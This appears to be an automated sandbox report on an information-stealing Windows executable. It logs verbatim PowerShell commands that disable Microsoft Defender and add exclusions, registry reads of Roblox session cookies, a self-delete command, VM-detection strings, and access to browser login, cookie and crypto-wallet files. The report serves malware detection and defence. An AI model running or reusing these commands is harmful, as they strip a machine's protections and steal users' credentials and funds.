Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: IDLBk4XMUa.exe, NcIxl.scr.0.dr | Binary or memory string: vboxtray
Source: NcIxl.scr.0.dr | Binary or memory string: vboxservice
Source: IDLBk4XMUa.exe, NcIxl.scr.0.dr | Binary or memory string: qemu-ga
Source: NcIxl.scr.0.dr | Binary or memory string: vmwareuser
Source: IDLBk4XMUa.exe, NcIxl.scr.0.dr | Binary or memory string: vmusrvc
Source: NcIxl.scr.0.dr | Binary or memory string: vmwareservice+discordtokenprotector
Source: NcIxl.scr.0.dr | Binary or memory string: vmsrvc
Source: NcIxl.scr.0.dr | Binary or memory string: vmtoolsd
Source: NcIxl.scr.0.dr | Binary or memory string: vmwaretray
Source: IDLBk4XMUa.exe, 00000000.00000002.1853846152.0000020097FD4000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: vmwareservice
Source: IDLBk4XMUa.exe, 00000000.00000002.1848224198.00000200964D7000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll~~
Source: C:\Users\user\Desktop\IDLBk4XMUa.exe | Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\IDLBk4XMUa.exe | Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Users\user\Desktop\IDLBk4XMUa.exe | Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\IDLBk4XMUa.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\IDLBk4XMUa.exe'
Source: C:\Users\user\Desktop\IDLBk4XMUa.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\IDLBk4XMUa.exe'
Source: C:\Users\user\Desktop\IDLBk4XMUa.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
Source: C:\Users\user\Desktop\IDLBk4XMUa.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
Source: C:\Users\user\Desktop\IDLBk4XMUa.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
Source: C:\Users\user\Desktop\IDLBk4XMUa.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
Source: C:\Users\user\Desktop\IDLBk4XMUa.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
Source: C:\Users\user\Desktop\IDLBk4XMUa.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
Source: C:\Users\user\Desktop\IDLBk4XMUa.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
Source: C:\Users\user\Desktop\IDLBk4XMUa.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
Source: C:\Users\user\Desktop\IDLBk4XMUa.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
Source: C:\Users\user\Desktop\IDLBk4XMUa.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
Source: C:\Users\user\Desktop\IDLBk4XMUa.exe | File written: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\IDLBk4XMUa.exe | Process created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" csproduct get uuid
Source: C:\Users\user\Desktop\IDLBk4XMUa.exe | Process created: C:\Windows\System32\attrib.exe "attrib.exe" +h +s "C:\Users\user\Desktop\IDLBk4XMUa.exe"
Source: C:\Users\user\Desktop\IDLBk4XMUa.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\IDLBk4XMUa.exe'
Source: C:\Users\user\Desktop\IDLBk4XMUa.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
Source: C:\Users\user\Desktop\IDLBk4XMUa.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Users\user\Desktop\IDLBk4XMUa.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Users\user\Desktop\IDLBk4XMUa.exe | Process created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" os get Caption
Source: C:\Users\user\Desktop\IDLBk4XMUa.exe | Process created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" computersystem get totalphysicalmemory
Source: C:\Users\user\Desktop\IDLBk4XMUa.exe | Process created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" csproduct get uuid
Source: C:\Users\user\Desktop\IDLBk4XMUa.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
Source: C:\Users\user\Desktop\IDLBk4XMUa.exe | Process created: C:\Windows\System32\wbem\WMIC.exe "wmic" path win32_VideoController get name
Source: C:\Users\user\Desktop\IDLBk4XMUa.exe | Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c ping localhost && del /F /A h "C:\Users\user\Desktop\IDLBk4XMUa.exe" && pause
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\PING.EXE ping localhost
Source: C:\Users\user\Desktop\IDLBk4XMUa.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2Jump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeQueries volume information: C:\Users\user\Desktop\IDLBk4XMUa.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                        Lowering of HIPS / PFW / Operating System Security Settings

Source: C:\Users\user\Desktop\IDLBk4XMUa.exe | File written: C:\Windows\System32\drivers\etc\hosts

                        Stealing of Sensitive Information

Source: Yara match | File source: IDLBk4XMUa.exe, type: SAMPLE
Source: Yara match | File source: 0.0.IDLBk4XMUa.exe.20096170000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.1853846152.00000200980F6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000000.1255622080.0000020096172000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1853846152.0000020097FEE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: IDLBk4XMUa.exe PID: 5076, type: MEMORYSTR
Source: Yara match | File source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\NcIxl.scr, type: DROPPED
Source: Yara match | File source: IDLBk4XMUa.exe, type: SAMPLE
Source: Yara match | File source: 0.0.IDLBk4XMUa.exe.20096170000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000000.1255622080.0000020096172000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: IDLBk4XMUa.exe PID: 5076, type: MEMORYSTR
Source: Yara match | File source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\NcIxl.scr, type: DROPPED
Source: IDLBk4XMUa.exe, 00000000.00000002.1853846152.0000020098670000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: Electrum
Source: IDLBk4XMUa.exe, 00000000.00000002.1853846152.0000020098670000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: com.liberty.jaxx
Source: IDLBk4XMUa.exe, 00000000.00000002.1853846152.0000020098670000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: 7C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: IDLBk4XMUa.exe, 00000000.00000002.1853846152.0000020098670000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: 4C:\Users\user\AppData\Roaming\Ethereum\keystore
Source: IDLBk4XMUa.exe, 00000000.00000002.1853846152.0000020098670000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: Exodus
Source: IDLBk4XMUa.exe, 00000000.00000002.1853846152.0000020098670000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: Ethereum
Source: IDLBk4XMUa.exe, 00000000.00000002.1853846152.0000020098670000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: 8C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: IDLBk4XMUa.exe, 00000000.00000002.1853846152.0000020098670000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: keystore
Source: C:\Users\user\Desktop\IDLBk4XMUa.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\IDLBk4XMUa.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb\000003.log
Source: C:\Users\user\Desktop\IDLBk4XMUa.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\IDLBk4XMUa.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\000003.log
Source: C:\Users\user\Desktop\IDLBk4XMUa.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log
Source: C:\Users\user\Desktop\IDLBk4XMUa.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\IDLBk4XMUa.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: Yara match | File source: 00000000.00000002.1853846152.0000020097FEE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: IDLBk4XMUa.exe PID: 5076, type: MEMORYSTR

                        Remote Access Functionality

Source: Yara match | File source: IDLBk4XMUa.exe, type: SAMPLE
Source: Yara match | File source: 0.0.IDLBk4XMUa.exe.20096170000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.1853846152.00000200980F6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000000.1255622080.0000020096172000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1853846152.0000020097FEE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: IDLBk4XMUa.exe PID: 5076, type: MEMORYSTR
Source: Yara match | File source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\NcIxl.scr, type: DROPPED
Source: Yara match | File source: IDLBk4XMUa.exe, type: SAMPLE
Source: Yara match | File source: 0.0.IDLBk4XMUa.exe.20096170000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000000.1255622080.0000020096172000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: IDLBk4XMUa.exe PID: 5076, type: MEMORYSTR
Source: Yara match | File source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\NcIxl.scr, type: DROPPED
MITRE ATT&CK Matrix (a number before a technique name is the count shown in the report for that cell; cells without a number are the matrix's default, unmatched entries):

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 1 Windows Management Instrumentation | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 File and Directory Permissions Modification | 1 OS Credential Dumping | 22 System Information Discovery | Remote Services | 1 Archive Collected Data | 1 Ingress Tool Transfer | Exfiltration Over Other Network Medium | Abuse Accessibility Features
